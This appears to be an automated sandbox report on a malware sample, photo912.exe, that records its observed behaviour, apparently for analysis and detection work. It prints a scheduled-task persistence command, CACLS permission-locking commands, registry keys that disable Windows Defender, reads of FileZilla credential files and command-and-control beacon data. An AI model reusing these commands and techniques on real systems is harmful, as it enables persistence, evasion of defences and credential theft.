reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP006.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP007.TMP\"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe" /F

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Collects information about installed applications (50 out of 190 events)

Time & API	Arguments	Status
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW June 13, 2023, 8:29 a.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (24 events)

Time & API	Arguments	Status	Return
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 13, 2023, 8:29 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=68ded0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	cmd /k echo Y\|CACLS "lamod.exe" /P "test22:N"&&CACLS "lamod.exe" /P "test22:R" /E&&echo Y\|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit
cmdline	CACLS "..\a9e2a16078" /P "test22:R" /E
cmdline	CACLS "..\a9e2a16078" /P "test22:N"
cmdline	CACLS "lamod.exe" /P "test22:N"
cmdline	CACLS "lamod.exe" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "lamod.exe" /P "test22:N"&&CACLS "lamod.exe" /P "test22:R" /E&&echo Y\|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

photo912.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All